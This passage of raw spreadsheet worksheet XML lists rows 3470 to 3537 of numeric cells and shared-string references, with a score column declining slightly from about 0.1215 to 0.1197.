      </c>
      <c r="C3470" s="2" t="s">
        <v>3273</v>
      </c>
      <c r="D3470" s="2">
        <v>1.0</v>
      </c>
      <c r="E3470" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3470" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3471" ht="15.75" customHeight="1">
      <c r="A3471" s="1">
        <v>6519.0</v>
      </c>
      <c r="B3471" s="2">
        <v>4.8800224E7</v>
      </c>
      <c r="C3471" s="2" t="s">
        <v>3274</v>
      </c>
      <c r="D3471" s="2">
        <v>1.0</v>
      </c>
      <c r="E3471" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3471" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3472" ht="15.75" customHeight="1">
      <c r="A3472" s="1">
        <v>6870.0</v>
      </c>
      <c r="B3472" s="2">
        <v>4.9684656E7</v>
      </c>
      <c r="C3472" s="2" t="s">
        <v>3275</v>
      </c>
      <c r="D3472" s="2">
        <v>1.0</v>
      </c>
      <c r="E3472" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3472" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3473" ht="15.75" customHeight="1">
      <c r="A3473" s="1">
        <v>7344.0</v>
      </c>
      <c r="B3473" s="2">
        <v>5.0979044E7</v>
      </c>
      <c r="C3473" s="2" t="s">
        <v>3276</v>
      </c>
      <c r="D3473" s="2">
        <v>1.0</v>
      </c>
      <c r="E3473" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3473" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3474" ht="15.75" customHeight="1">
      <c r="A3474" s="1">
        <v>8399.0</v>
      </c>
      <c r="B3474" s="2">
        <v>5.3858655E7</v>
      </c>
      <c r="C3474" s="2" t="s">
        <v>3277</v>
      </c>
      <c r="D3474" s="2">
        <v>1.0</v>
      </c>
      <c r="E3474" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3474" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3475" ht="15.75" customHeight="1">
      <c r="A3475" s="1">
        <v>9420.0</v>
      </c>
      <c r="B3475" s="2">
        <v>5.5794304E7</v>
      </c>
      <c r="C3475" s="2" t="s">
        <v>3278</v>
      </c>
      <c r="D3475" s="2">
        <v>1.0</v>
      </c>
      <c r="E3475" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3475" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3476" ht="15.75" customHeight="1">
      <c r="A3476" s="1">
        <v>9738.0</v>
      </c>
      <c r="B3476" s="2">
        <v>5.6452069E7</v>
      </c>
      <c r="C3476" s="2" t="s">
        <v>3279</v>
      </c>
      <c r="D3476" s="2">
        <v>1.0</v>
      </c>
      <c r="E3476" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3476" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3477" ht="15.75" customHeight="1">
      <c r="A3477" s="1">
        <v>10460.0</v>
      </c>
      <c r="B3477" s="2">
        <v>1.0730179E7</v>
      </c>
      <c r="C3477" s="2" t="s">
        <v>3280</v>
      </c>
      <c r="D3477" s="2">
        <v>1.0</v>
      </c>
      <c r="E3477" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3477" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3478" ht="15.75" customHeight="1">
      <c r="A3478" s="1">
        <v>10859.0</v>
      </c>
      <c r="B3478" s="2">
        <v>1.6309914E7</v>
      </c>
      <c r="C3478" s="2" t="s">
        <v>3281</v>
      </c>
      <c r="D3478" s="2">
        <v>1.0</v>
      </c>
      <c r="E3478" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3478" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3479" ht="15.75" customHeight="1">
      <c r="A3479" s="1">
        <v>11656.0</v>
      </c>
      <c r="B3479" s="2">
        <v>2331661.0</v>
      </c>
      <c r="C3479" s="2" t="s">
        <v>3282</v>
      </c>
      <c r="D3479" s="2">
        <v>1.0</v>
      </c>
      <c r="E3479" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3479" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3480" ht="15.75" customHeight="1">
      <c r="A3480" s="1">
        <v>12030.0</v>
      </c>
      <c r="B3480" s="2">
        <v>2.6224945E7</v>
      </c>
      <c r="C3480" s="2" t="s">
        <v>3283</v>
      </c>
      <c r="D3480" s="2">
        <v>1.0</v>
      </c>
      <c r="E3480" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3480" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3481" ht="15.75" customHeight="1">
      <c r="A3481" s="1">
        <v>14396.0</v>
      </c>
      <c r="B3481" s="2">
        <v>3.9135112E7</v>
      </c>
      <c r="C3481" s="2" t="s">
        <v>3284</v>
      </c>
      <c r="D3481" s="2">
        <v>1.0</v>
      </c>
      <c r="E3481" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3481" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3482" ht="15.75" customHeight="1">
      <c r="A3482" s="1">
        <v>15181.0</v>
      </c>
      <c r="B3482" s="2">
        <v>4.2025368E7</v>
      </c>
      <c r="C3482" s="2" t="s">
        <v>3285</v>
      </c>
      <c r="D3482" s="2">
        <v>1.0</v>
      </c>
      <c r="E3482" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3482" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3483" ht="15.75" customHeight="1">
      <c r="A3483" s="1">
        <v>15708.0</v>
      </c>
      <c r="B3483" s="2">
        <v>4.396521E7</v>
      </c>
      <c r="C3483" s="2" t="s">
        <v>3286</v>
      </c>
      <c r="D3483" s="2">
        <v>1.0</v>
      </c>
      <c r="E3483" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3483" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3484" ht="15.75" customHeight="1">
      <c r="A3484" s="1">
        <v>16449.0</v>
      </c>
      <c r="B3484" s="2">
        <v>4.6419481E7</v>
      </c>
      <c r="C3484" s="2" t="s">
        <v>3287</v>
      </c>
      <c r="D3484" s="2">
        <v>1.0</v>
      </c>
      <c r="E3484" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3484" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3485" ht="15.75" customHeight="1">
      <c r="A3485" s="1">
        <v>17453.0</v>
      </c>
      <c r="B3485" s="2">
        <v>4.9822436E7</v>
      </c>
      <c r="C3485" s="2" t="s">
        <v>3288</v>
      </c>
      <c r="D3485" s="2">
        <v>1.0</v>
      </c>
      <c r="E3485" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3485" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3486" ht="15.75" customHeight="1">
      <c r="A3486" s="1">
        <v>17964.0</v>
      </c>
      <c r="B3486" s="2">
        <v>5.1346588E7</v>
      </c>
      <c r="C3486" s="2" t="s">
        <v>3289</v>
      </c>
      <c r="D3486" s="2">
        <v>1.0</v>
      </c>
      <c r="E3486" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3486" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3487" ht="15.75" customHeight="1">
      <c r="A3487" s="1">
        <v>18868.0</v>
      </c>
      <c r="B3487" s="2">
        <v>5.4047345E7</v>
      </c>
      <c r="C3487" s="2" t="s">
        <v>3290</v>
      </c>
      <c r="D3487" s="2">
        <v>1.0</v>
      </c>
      <c r="E3487" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3487" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3488" ht="15.75" customHeight="1">
      <c r="A3488" s="1">
        <v>20205.0</v>
      </c>
      <c r="B3488" s="2">
        <v>1.0641135E7</v>
      </c>
      <c r="C3488" s="2" t="s">
        <v>3291</v>
      </c>
      <c r="D3488" s="2">
        <v>1.0</v>
      </c>
      <c r="E3488" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3488" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3489" ht="15.75" customHeight="1">
      <c r="A3489" s="1">
        <v>30747.0</v>
      </c>
      <c r="B3489" s="2">
        <v>4.4136259E7</v>
      </c>
      <c r="C3489" s="2" t="s">
        <v>3292</v>
      </c>
      <c r="D3489" s="2">
        <v>1.0</v>
      </c>
      <c r="E3489" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3489" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3490" ht="15.75" customHeight="1">
      <c r="A3490" s="1">
        <v>32589.0</v>
      </c>
      <c r="B3490" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C3490" s="2" t="s">
        <v>3293</v>
      </c>
      <c r="D3490" s="2">
        <v>1.0</v>
      </c>
      <c r="E3490" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3490" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="3491" ht="15.75" customHeight="1">
      <c r="A3491" s="1">
        <v>4423.0</v>
      </c>
      <c r="B3491" s="2">
        <v>4.2307925E7</v>
      </c>
      <c r="C3491" s="2" t="s">
        <v>3294</v>
      </c>
      <c r="D3491" s="2">
        <v>1.0</v>
      </c>
      <c r="E3491" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3491" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="3492" ht="15.75" customHeight="1">
      <c r="A3492" s="1">
        <v>12064.0</v>
      </c>
      <c r="B3492" s="2">
        <v>2.6551794E7</v>
      </c>
      <c r="C3492" s="2" t="s">
        <v>3295</v>
      </c>
      <c r="D3492" s="2">
        <v>1.0</v>
      </c>
      <c r="E3492" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3492" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="3493" ht="15.75" customHeight="1">
      <c r="A3493" s="1">
        <v>17246.0</v>
      </c>
      <c r="B3493" s="2">
        <v>4.9083243E7</v>
      </c>
      <c r="C3493" s="2" t="s">
        <v>3296</v>
      </c>
      <c r="D3493" s="2">
        <v>1.0</v>
      </c>
      <c r="E3493" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3493" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="3494" ht="15.75" customHeight="1">
      <c r="A3494" s="1">
        <v>19365.0</v>
      </c>
      <c r="B3494" s="2">
        <v>5.5468669E7</v>
      </c>
      <c r="C3494" s="2" t="s">
        <v>3297</v>
      </c>
      <c r="D3494" s="2">
        <v>1.0</v>
      </c>
      <c r="E3494" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3494" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="3495" ht="15.75" customHeight="1">
      <c r="A3495" s="1">
        <v>7481.0</v>
      </c>
      <c r="B3495" s="2">
        <v>5.1352579E7</v>
      </c>
      <c r="C3495" s="2" t="s">
        <v>3298</v>
      </c>
      <c r="D3495" s="2">
        <v>1.0</v>
      </c>
      <c r="E3495" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3495" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="3496" ht="15.75" customHeight="1">
      <c r="A3496" s="1">
        <v>11503.0</v>
      </c>
      <c r="B3496" s="2">
        <v>2.2124726E7</v>
      </c>
      <c r="C3496" s="2" t="s">
        <v>3299</v>
      </c>
      <c r="D3496" s="2">
        <v>1.0</v>
      </c>
      <c r="E3496" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3496" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="3497" ht="15.75" customHeight="1">
      <c r="A3497" s="1">
        <v>17781.0</v>
      </c>
      <c r="B3497" s="2">
        <v>5.0773979E7</v>
      </c>
      <c r="C3497" s="2" t="s">
        <v>3300</v>
      </c>
      <c r="D3497" s="2">
        <v>1.0</v>
      </c>
      <c r="E3497" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3497" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="3498" ht="15.75" customHeight="1">
      <c r="A3498" s="1">
        <v>33551.0</v>
      </c>
      <c r="B3498" s="2">
        <v>8193850.0</v>
      </c>
      <c r="C3498" s="2" t="s">
        <v>3301</v>
      </c>
      <c r="D3498" s="2">
        <v>1.0</v>
      </c>
      <c r="E3498" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3498" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="3499" ht="15.75" customHeight="1">
      <c r="A3499" s="1">
        <v>18072.0</v>
      </c>
      <c r="B3499" s="2">
        <v>5.1614256E7</v>
      </c>
      <c r="C3499" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="D3499" s="2">
        <v>1.0</v>
      </c>
      <c r="E3499" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3499" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="3500" ht="15.75" customHeight="1">
      <c r="A3500" s="1">
        <v>30142.0</v>
      </c>
      <c r="B3500" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C3500" s="2" t="s">
        <v>3303</v>
      </c>
      <c r="D3500" s="2">
        <v>1.0</v>
      </c>
      <c r="E3500" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3500" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="3501" ht="15.75" customHeight="1">
      <c r="A3501" s="1">
        <v>17291.0</v>
      </c>
      <c r="B3501" s="2">
        <v>4.9237359E7</v>
      </c>
      <c r="C3501" s="2" t="s">
        <v>3304</v>
      </c>
      <c r="D3501" s="2">
        <v>1.0</v>
      </c>
      <c r="E3501" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3501" s="2">
        <v>0.1206597222222223</v>
      </c>
    </row>
    <row r="3502" ht="15.75" customHeight="1">
      <c r="A3502" s="1">
        <v>16669.0</v>
      </c>
      <c r="B3502" s="2">
        <v>4.7270426E7</v>
      </c>
      <c r="C3502" s="2" t="s">
        <v>3305</v>
      </c>
      <c r="D3502" s="2">
        <v>1.0</v>
      </c>
      <c r="E3502" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3502" s="2">
        <v>0.1206597222222222</v>
      </c>
    </row>
    <row r="3503" ht="15.75" customHeight="1">
      <c r="A3503" s="1">
        <v>16676.0</v>
      </c>
      <c r="B3503" s="2">
        <v>4.7281052E7</v>
      </c>
      <c r="C3503" s="2" t="s">
        <v>3306</v>
      </c>
      <c r="D3503" s="2">
        <v>1.0</v>
      </c>
      <c r="E3503" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3503" s="2">
        <v>0.1206597222222222</v>
      </c>
    </row>
    <row r="3504" ht="15.75" customHeight="1">
      <c r="A3504" s="1">
        <v>163.0</v>
      </c>
      <c r="B3504" s="2">
        <v>1.375984E7</v>
      </c>
      <c r="C3504" s="2" t="s">
        <v>3307</v>
      </c>
      <c r="D3504" s="2">
        <v>1.0</v>
      </c>
      <c r="E3504" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3504" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="3505" ht="15.75" customHeight="1">
      <c r="A3505" s="1">
        <v>1519.0</v>
      </c>
      <c r="B3505" s="2">
        <v>2.7364581E7</v>
      </c>
      <c r="C3505" s="2" t="s">
        <v>3308</v>
      </c>
      <c r="D3505" s="2">
        <v>1.0</v>
      </c>
      <c r="E3505" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3505" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="3506" ht="15.75" customHeight="1">
      <c r="A3506" s="1">
        <v>13756.0</v>
      </c>
      <c r="B3506" s="2">
        <v>3.6504203E7</v>
      </c>
      <c r="C3506" s="2" t="s">
        <v>3309</v>
      </c>
      <c r="D3506" s="2">
        <v>1.0</v>
      </c>
      <c r="E3506" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3506" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="3507" ht="15.75" customHeight="1">
      <c r="A3507" s="1">
        <v>128.0</v>
      </c>
      <c r="B3507" s="2">
        <v>1.3219792E7</v>
      </c>
      <c r="C3507" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="D3507" s="2">
        <v>1.0</v>
      </c>
      <c r="E3507" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3507" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="3508" ht="15.75" customHeight="1">
      <c r="A3508" s="1">
        <v>2942.0</v>
      </c>
      <c r="B3508" s="2">
        <v>3.596244E7</v>
      </c>
      <c r="C3508" s="2" t="s">
        <v>3311</v>
      </c>
      <c r="D3508" s="2">
        <v>1.0</v>
      </c>
      <c r="E3508" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3508" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="3509" ht="15.75" customHeight="1">
      <c r="A3509" s="1">
        <v>3391.0</v>
      </c>
      <c r="B3509" s="2">
        <v>3.7971353E7</v>
      </c>
      <c r="C3509" s="2" t="s">
        <v>3312</v>
      </c>
      <c r="D3509" s="2">
        <v>1.0</v>
      </c>
      <c r="E3509" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3509" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="3510" ht="15.75" customHeight="1">
      <c r="A3510" s="1">
        <v>8470.0</v>
      </c>
      <c r="B3510" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C3510" s="2" t="s">
        <v>3313</v>
      </c>
      <c r="D3510" s="2">
        <v>1.0</v>
      </c>
      <c r="E3510" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3510" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="3511" ht="15.75" customHeight="1">
      <c r="A3511" s="1">
        <v>14916.0</v>
      </c>
      <c r="B3511" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C3511" s="2" t="s">
        <v>3314</v>
      </c>
      <c r="D3511" s="2">
        <v>1.0</v>
      </c>
      <c r="E3511" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3511" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="3512" ht="15.75" customHeight="1">
      <c r="A3512" s="1">
        <v>16386.0</v>
      </c>
      <c r="B3512" s="2">
        <v>4.6235242E7</v>
      </c>
      <c r="C3512" s="2" t="s">
        <v>3315</v>
      </c>
      <c r="D3512" s="2">
        <v>1.0</v>
      </c>
      <c r="E3512" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3512" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="3513" ht="15.75" customHeight="1">
      <c r="A3513" s="1">
        <v>28540.0</v>
      </c>
      <c r="B3513" s="2">
        <v>2.684247E7</v>
      </c>
      <c r="C3513" s="2" t="s">
        <v>3316</v>
      </c>
      <c r="D3513" s="2">
        <v>1.0</v>
      </c>
      <c r="E3513" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3513" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="3514" ht="15.75" customHeight="1">
      <c r="A3514" s="1">
        <v>29722.0</v>
      </c>
      <c r="B3514" s="2">
        <v>3.4485941E7</v>
      </c>
      <c r="C3514" s="2" t="s">
        <v>3317</v>
      </c>
      <c r="D3514" s="2">
        <v>1.0</v>
      </c>
      <c r="E3514" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3514" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="3515" ht="15.75" customHeight="1">
      <c r="A3515" s="1">
        <v>4028.0</v>
      </c>
      <c r="B3515" s="2">
        <v>4.1002611E7</v>
      </c>
      <c r="C3515" s="2" t="s">
        <v>3318</v>
      </c>
      <c r="D3515" s="2">
        <v>1.0</v>
      </c>
      <c r="E3515" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3515" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3516" ht="15.75" customHeight="1">
      <c r="A3516" s="1">
        <v>11498.0</v>
      </c>
      <c r="B3516" s="2">
        <v>2.2087962E7</v>
      </c>
      <c r="C3516" s="2" t="s">
        <v>3319</v>
      </c>
      <c r="D3516" s="2">
        <v>1.0</v>
      </c>
      <c r="E3516" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3516" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3517" ht="15.75" customHeight="1">
      <c r="A3517" s="1">
        <v>14545.0</v>
      </c>
      <c r="B3517" s="2">
        <v>3.9931407E7</v>
      </c>
      <c r="C3517" s="2" t="s">
        <v>3320</v>
      </c>
      <c r="D3517" s="2">
        <v>1.0</v>
      </c>
      <c r="E3517" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3517" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3518" ht="15.75" customHeight="1">
      <c r="A3518" s="1">
        <v>15203.0</v>
      </c>
      <c r="B3518" s="2">
        <v>4.2090458E7</v>
      </c>
      <c r="C3518" s="2" t="s">
        <v>3321</v>
      </c>
      <c r="D3518" s="2">
        <v>1.0</v>
      </c>
      <c r="E3518" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3518" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3519" ht="15.75" customHeight="1">
      <c r="A3519" s="1">
        <v>17692.0</v>
      </c>
      <c r="B3519" s="2">
        <v>5.0516653E7</v>
      </c>
      <c r="C3519" s="2" t="s">
        <v>3322</v>
      </c>
      <c r="D3519" s="2">
        <v>1.0</v>
      </c>
      <c r="E3519" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3519" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3520" ht="15.75" customHeight="1">
      <c r="A3520" s="1">
        <v>29435.0</v>
      </c>
      <c r="B3520" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C3520" s="2" t="s">
        <v>3323</v>
      </c>
      <c r="D3520" s="2">
        <v>1.0</v>
      </c>
      <c r="E3520" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3520" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3521" ht="15.75" customHeight="1">
      <c r="A3521" s="1">
        <v>32000.0</v>
      </c>
      <c r="B3521" s="2">
        <v>5.3411538E7</v>
      </c>
      <c r="C3521" s="2" t="s">
        <v>3084</v>
      </c>
      <c r="D3521" s="2">
        <v>1.0</v>
      </c>
      <c r="E3521" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3521" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="3522" ht="15.75" customHeight="1">
      <c r="A3522" s="1">
        <v>3551.0</v>
      </c>
      <c r="B3522" s="2">
        <v>3.8778152E7</v>
      </c>
      <c r="C3522" s="2" t="s">
        <v>3324</v>
      </c>
      <c r="D3522" s="2">
        <v>1.0</v>
      </c>
      <c r="E3522" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3522" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3523" ht="15.75" customHeight="1">
      <c r="A3523" s="1">
        <v>4099.0</v>
      </c>
      <c r="B3523" s="2">
        <v>4.1299917E7</v>
      </c>
      <c r="C3523" s="2" t="s">
        <v>3325</v>
      </c>
      <c r="D3523" s="2">
        <v>1.0</v>
      </c>
      <c r="E3523" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3523" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3524" ht="15.75" customHeight="1">
      <c r="A3524" s="1">
        <v>5838.0</v>
      </c>
      <c r="B3524" s="2">
        <v>4.6906493E7</v>
      </c>
      <c r="C3524" s="2" t="s">
        <v>3326</v>
      </c>
      <c r="D3524" s="2">
        <v>1.0</v>
      </c>
      <c r="E3524" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3524" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3525" ht="15.75" customHeight="1">
      <c r="A3525" s="1">
        <v>5863.0</v>
      </c>
      <c r="B3525" s="2">
        <v>4.6961775E7</v>
      </c>
      <c r="C3525" s="2" t="s">
        <v>3327</v>
      </c>
      <c r="D3525" s="2">
        <v>1.0</v>
      </c>
      <c r="E3525" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3525" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3526" ht="15.75" customHeight="1">
      <c r="A3526" s="1">
        <v>12339.0</v>
      </c>
      <c r="B3526" s="2">
        <v>2.8601425E7</v>
      </c>
      <c r="C3526" s="2" t="s">
        <v>3328</v>
      </c>
      <c r="D3526" s="2">
        <v>1.0</v>
      </c>
      <c r="E3526" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3526" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3527" ht="15.75" customHeight="1">
      <c r="A3527" s="1">
        <v>13962.0</v>
      </c>
      <c r="B3527" s="2">
        <v>3.7309598E7</v>
      </c>
      <c r="C3527" s="2" t="s">
        <v>3329</v>
      </c>
      <c r="D3527" s="2">
        <v>1.0</v>
      </c>
      <c r="E3527" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3527" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3528" ht="15.75" customHeight="1">
      <c r="A3528" s="1">
        <v>14281.0</v>
      </c>
      <c r="B3528" s="2">
        <v>3.8468485E7</v>
      </c>
      <c r="C3528" s="2" t="s">
        <v>3330</v>
      </c>
      <c r="D3528" s="2">
        <v>1.0</v>
      </c>
      <c r="E3528" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3528" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3529" ht="15.75" customHeight="1">
      <c r="A3529" s="1">
        <v>14454.0</v>
      </c>
      <c r="B3529" s="2">
        <v>3.9397557E7</v>
      </c>
      <c r="C3529" s="2" t="s">
        <v>3331</v>
      </c>
      <c r="D3529" s="2">
        <v>1.0</v>
      </c>
      <c r="E3529" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3529" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3530" ht="15.75" customHeight="1">
      <c r="A3530" s="1">
        <v>16152.0</v>
      </c>
      <c r="B3530" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C3530" s="2" t="s">
        <v>3332</v>
      </c>
      <c r="D3530" s="2">
        <v>1.0</v>
      </c>
      <c r="E3530" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3530" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3531" ht="15.75" customHeight="1">
      <c r="A3531" s="1">
        <v>20012.0</v>
      </c>
      <c r="B3531" s="2">
        <v>5.7740849E7</v>
      </c>
      <c r="C3531" s="2" t="s">
        <v>3333</v>
      </c>
      <c r="D3531" s="2">
        <v>1.0</v>
      </c>
      <c r="E3531" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3531" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3532" ht="15.75" customHeight="1">
      <c r="A3532" s="1">
        <v>20040.0</v>
      </c>
      <c r="B3532" s="2">
        <v>7562641.0</v>
      </c>
      <c r="C3532" s="2" t="s">
        <v>3334</v>
      </c>
      <c r="D3532" s="2">
        <v>1.0</v>
      </c>
      <c r="E3532" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3532" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3533" ht="15.75" customHeight="1">
      <c r="A3533" s="1">
        <v>34073.0</v>
      </c>
      <c r="B3533" s="2">
        <v>9655769.0</v>
      </c>
      <c r="C3533" s="2" t="s">
        <v>3335</v>
      </c>
      <c r="D3533" s="2">
        <v>1.0</v>
      </c>
      <c r="E3533" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3533" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="3534" ht="15.75" customHeight="1">
      <c r="A3534" s="1">
        <v>9045.0</v>
      </c>
      <c r="B3534" s="2">
        <v>5.5057299E7</v>
      </c>
      <c r="C3534" s="2" t="s">
        <v>3336</v>
      </c>
      <c r="D3534" s="2">
        <v>1.0</v>
      </c>
      <c r="E3534" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3534" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="3535" ht="15.75" customHeight="1">
      <c r="A3535" s="1">
        <v>9294.0</v>
      </c>
      <c r="B3535" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C3535" s="2" t="s">
        <v>3337</v>
      </c>
      <c r="D3535" s="2">
        <v>1.0</v>
      </c>
      <c r="E3535" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3535" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="3536" ht="15.75" customHeight="1">
      <c r="A3536" s="1">
        <v>10154.0</v>
      </c>
      <c r="B3536" s="2">
        <v>5.7326395E7</v>
      </c>
      <c r="C3536" s="2" t="s">
        <v>3338</v>
      </c>
      <c r="D3536" s="2">
        <v>1.0</v>
      </c>
      <c r="E3536" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3536" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="3537" ht="15.75" customHeight="1">
      <c r="A3537" s="1">
        <v>11609.0</v>
      </c>
      <c r="B3537" s="2">
        <v>2.3039864E7</v>
      </c>
